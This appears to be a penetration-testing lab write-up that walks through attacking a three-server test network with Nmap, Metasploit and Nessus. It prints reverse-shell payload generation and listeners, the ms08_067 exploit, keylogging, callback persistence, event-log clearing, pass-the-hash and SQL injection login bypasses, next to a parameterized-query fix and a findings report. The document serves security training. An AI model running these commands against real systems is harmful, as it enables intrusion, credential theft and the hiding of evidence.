Steps to Become a Successful Website Penetration Tester


This test involves a vulnerable Ubuntu Linux server sitting in a DMZ acting as our entry point, one Windows server acting as a vulnerable server segmented from direct internet access, and a "secure" Debian 6 Linux server running a vulnerable web site. Following the penetration testing methodology, we walk through a step by step penetration test.

An attack machine running Kali Linux, using the Metasploit framework, Nessus and Google, is used to perform the tests.
Research time: ~8 hours (how to set up the servers, installing vulnerabilities, how to recon, exploit, maintain access)
Setup time for servers: ~13 hours
Recon time & assessment: ~2 hours
Actual action: ~10 hours, involving exploiting servers, keeping access, pivoting, assessing various tools, exploits, backdoors and information gathering tools (such as key loggers).
Miscellaneous report writing & actual class assignment: ~2 hours

Step by Step Penetration Test Methodology
Recon/Scanning:
To perform an intelligent test of a network, information and intelligence gathering is the first logical step any tester (or hacker) should perform. Nmap and Nessus are two of the most common tools used to scan a host/network in order to probe for services, open ports and general information such as the operating system. These tools are often used for an external test. Internal tests require a bit more finesse and stealth.
Before running Metasploit, start the database and the Metasploit service:
service postgresql start && service metasploit start
From the msfconsole run:
nmap -O -sV -sC -oX /root/capstone/nmap-scan.xml --stylesheet=nmap.xsl 192.168.142.130-145
This will probe open ports to determine service/version information (-sV), attempt OS detection (-O), run the default scripts (-sC) and write the results as XML (-oX). To import this file back into Metasploit:
db_import /root/capstone/nmap-scan.xml
We can now see each host's IP together with the port, protocol and service in use. Since version detection was enabled, it also displays which version of each service is running. A "d" at the end of a service name such as ircd stands for "daemon", meaning a background process is listening on that port. To search for modules for a particular service, use the search command. For example, "search postfix" would search for postfix modules.
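The host/port/service/version data that db_import reads from the -oX file can also be pulled out directly for an asset inventory. The parser below is an added example, not code from the original post; the XML it parses is a constructed sample in nmap's -oX layout with lab placeholder addresses, not real scan output.

```python
# Added example (not from the original post): parse the XML written by
# `nmap -oX`, the same data the post reads back with `db_import`.
import xml.etree.ElementTree as ET

# Constructed sample in nmap's -oX format (lab placeholder, not real scan output).
SAMPLE_NMAP_XML = """<nmaprun scanner="nmap" args="nmap -O -sV -sC -oX nmap-scan.xml 192.168.142.130">
  <host>
    <status state="up" reason="arp-response"/>
    <address addr="192.168.142.130" addrtype="ipv4"/>
    <ports>
      <port protocol="tcp" portid="22">
        <state state="open" reason="syn-ack"/>
        <service name="ssh" product="OpenSSH" version="5.3p1" conf="10"/>
      </port>
      <port protocol="tcp" portid="6667">
        <state state="open" reason="syn-ack"/>
        <service name="irc" product="UnrealIRCd" conf="10"/>
      </port>
      <port protocol="tcp" portid="139">
        <state state="filtered" reason="no-response"/>
      </port>
    </ports>
  </host>
</nmaprun>
"""

def parse_nmap_xml(xml_text):
    """Return [(ip, port, proto, service, product+version)] for open ports only."""
    root = ET.fromstring(xml_text)
    findings = []
    for host in root.iter("host"):
        addr = host.find("address[@addrtype='ipv4']")
        if addr is None:
            continue
        for port in host.iter("port"):
            state = port.find("state")
            if state is None or state.get("state") != "open":
                continue  # closed/filtered ports carry no service to inventory
            svc = port.find("service")
            name = svc.get("name", "unknown") if svc is not None else "unknown"
            # Join product and version, skipping whichever nmap did not report.
            parts = [svc.get("product"), svc.get("version")] if svc is not None else []
            findings.append((addr.get("addr"), int(port.get("portid")),
                             port.get("protocol"), name, " ".join(p for p in parts if p)))
    return findings

if __name__ == "__main__":
    for row in parse_nmap_xml(SAMPLE_NMAP_XML):
        print(row)
```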

Management
Armitage: At the command line, type armitage to start the Armitage target visualization and management tool (if not installed, run apt-get install armitage). Armitage will use the data imported from Nmap to populate the graphical interface with hosts.

Exploitation
With the Nmap scan completed, and in msfconsole, view hosts with the "hosts" command (Target Server is the name of the target).
Pick a vulnerability and use search <software name> to find modules for it.
Target a vulnerable server to exploit in order to gain access. Using this server, we will pivot to a more secure server on the inside of the network. I have targeted a webserver that allows command injection, which allows me to download data. I have opted to use the reverse_tcp payload in order to get a meterpreter shell (not just a command shell) on the target machine.
From msfconsole:
msfvenom -p php/meterpreter/reverse_tcp LHOST=<IP address of attacking machine> -f raw > /tmp/bk.php
(Be sure to edit bk.php, or whatever you named it, and remove the leading #.)
From /tmp start a simple webserver using:
python -m SimpleHTTPServer
We then transfer bk.php to the vulnerable webserver. Once the reverse tcp meterpreter payload contained in bk.php connects back to our attack machine, we gain a meterpreter shell. Set up the listener first:
msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST <local IP>
msf exploit(handler) > exploit

Pivoting
We have obtained a meterpreter shell on the web server. We will need to background meterpreter so we can set up our pivot. To do this, we can use the Metasploit route command to associate the new route with our meterpreter session. We have intel on a Windows 2000 server on the internal side. I have chosen to use the reliable RPC exploit ms08_067_netapi.
use exploit/windows/smb/ms08_067_netapi
set RHOST 192.168.142.134
set PAYLOAD windows/meterpreter/bind_tcp
show targets
set target 1
exploit

Maintaining connection state
Exploited processes can be reset due to bad connections, anti-virus software and a host of other system activities. To guard against this, we can migrate our meterpreter session into a stable system process.
meterpreter > ps (to list processes)
meterpreter > migrate <pid number>
meterpreter > keyscan_start
meterpreter > keyscan_dump
We could also migrate to the winlogon process to capture the credentials of users logging into a Windows system, running the same keyscan commands.

Maintaining future access
Maintaining access to a compromised system is essential as one never knows when a patch will be applied. This way, the time involved in compromising the system will not be wasted, and you can still gain access to the system. Metasploit has a Meterpreter script, persistence.rb, which will create a Meterpreter service that will be available to you even if the remote system is rebooted.
We will configure our persistent Meterpreter session to wait until a user logs on to the remote system and try to connect back to our listener every 5 seconds at IP address <attacker IP> on port 443. On a compromised system:
meterpreter > run persistence -U -i 5 -p 443 -r <attacker IP>
meterpreter > exit
msf exploit(ms08_067_netapi) > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.71
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit
When a user logs in to the remote system, a Meterpreter session is opened up for us.

Covering tracks
Clearing Windows event logs is a good practice if you do not want your activities, or the methods by which an exploit was used, to be logged. From the meterpreter prompt, we can use the interactive Ruby shell to clear logs as we progress.
meterpreter > irb
>> log = client.sys.eventlog.open('system')
>> log.clear


Step by Step Website Penetration SQL injection
Vulnerability scanners often miss SQL injection vulnerabilities in websites. If we browse to the server that seems secure, and that we know hosts a web page, we can do some reconnaissance of our own to check whether everything really is secure. This website has an Admin Login link; this can reveal the type of database being used. At the login screen, input a single quote into the username field and press enter. From the response we can determine that the server is using MySQL on the backend.

At the admin login screen, at the username prompt enter a single quote, a space, OR, a space, 1=1, a space, two dashes and a trailing space:
' OR 1=1 -- 

This comments out the AND password part of the query. OR 1=1 forces the WHERE clause to be true when a login script is being exploited: the condition becomes username = '' OR 1=1, which is always TRUE. The -- (the MySQL comment symbol, which must be followed by a space) comments out the AND password section of the MySQL query.

If we wanted to log in as a specific user with admin privileges, enter a random username and in the password field enter:
' or (1=1 and username='someguy') -- 
To fix this issue, patching will not be sufficient. The developer should use Prepared Statements (Parameterized Queries).

Parameterized queries force the developer to first define all the SQL code, and then pass in each parameter to the query later. This coding style allows the database to distinguish between code and data, regardless of what user input is supplied.
Prepared statements ensure that an attacker is not able to change the intent of a query, even if SQL commands are inserted by an attacker.
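The concatenated login query next to its parameterized form, as an added example that is not code from the original post. It runs against an in-memory SQLite table constructed for the example (the user "someguy" and its password are sample values); SQLite accepts the same ' OR 1=1 -- input the post uses against MySQL, so the bypass and the fix can be reproduced offline.

```python
# Added example (not from the original post): string-built login query beside
# the parameterized fix, exercised with the two inputs described above.
import sqlite3

def make_db():
    # Constructed users table; the credential is a sample, not from the post.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT, is_admin INTEGER)")
    conn.execute("INSERT INTO users VALUES ('someguy', 'correcthorse', 1)")
    return conn

def login_vulnerable(conn, username, password):
    """Query text built from user input: the input is parsed as SQL code."""
    sql = ("SELECT username FROM users WHERE username = '%s' AND password = '%s'"
           % (username, password))
    row = conn.execute(sql).fetchone()
    return row[0] if row else None

def login_parameterized(conn, username, password):
    """Prepared statement: the SQL is fixed first, input is bound as data only."""
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    row = conn.execute(sql, (username, password)).fetchone()
    return row[0] if row else None

if __name__ == "__main__":
    db = make_db()
    user_field = "' OR 1=1 -- "                         # username-field input
    pw_field = "' or (1=1 and username='someguy') -- "  # password-field input
    print(login_vulnerable(db, user_field, "anything"))       # someguy: bypassed
    print(login_vulnerable(db, "random", pw_field))           # someguy: bypassed
    print(login_parameterized(db, user_field, "anything"))    # None: treated as data
    print(login_parameterized(db, "random", pw_field))        # None: treated as data
    print(login_parameterized(db, "someguy", "correcthorse")) # someguy: real login
```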


Step by Step Penetration Test Report Summary
Using Nessus to perform an internal & web application scan, 173 total vulnerabilities were identified over 3 servers:

External Web Server
OS: Ubuntu 10.04
IP: 192.168.142.130
7 Critical risk vulnerabilities detected
5 High risk vulnerabilities detected
14 Medium risk vulnerabilities detected
3 Low risk vulnerabilities detected

Internal File Server
OS: Windows 2000 Server
IP: 192.168.142.134
22 Critical risk vulnerabilities detected
5 High risk vulnerabilities detected
13 Medium risk vulnerabilities detected
6 Low risk vulnerabilities detected

Internal Web/Email Server
OS: Debian 6.0
IP: 192.168.142.140
1 Medium risk vulnerability detected

Step by Step Penetration Test Report
Stage 1:
The external web server was vulnerable to command injection. This weakness allowed Red Team to deposit a backdoor on the web server. Using this backdoor, Red Team was able to establish a meterpreter session with the target host. Even once this vulnerability is patched, the UnrealIRC daemon can be exploited; however, that gives a standard shell rather than a meterpreter session. This vulnerability is also not listed in the Nessus report, which is the reason we targeted this specific attack at this server.
Stage 2:
Having established a meterpreter session, we used the ms08_067_netapi vulnerability on the unpatched Internal File Server to pivot to that File Server. We have now used the vulnerable external server to bypass the network protections. Red Team then installed the persistence script to enable access without the need for a pivot server, and patched the server to prevent other hackers from accessing it. Red Team then migrates the meterpreter process to explorer.exe and runs keyscan to capture all keyboard entry; migrating to winlogon.exe instead also captures the login information of users who log in after keyscan is running.
If we are unable to grab passwords via key logging, we fall back to password hash passing using the psexec module of Metasploit.

Credits: 4ntipatika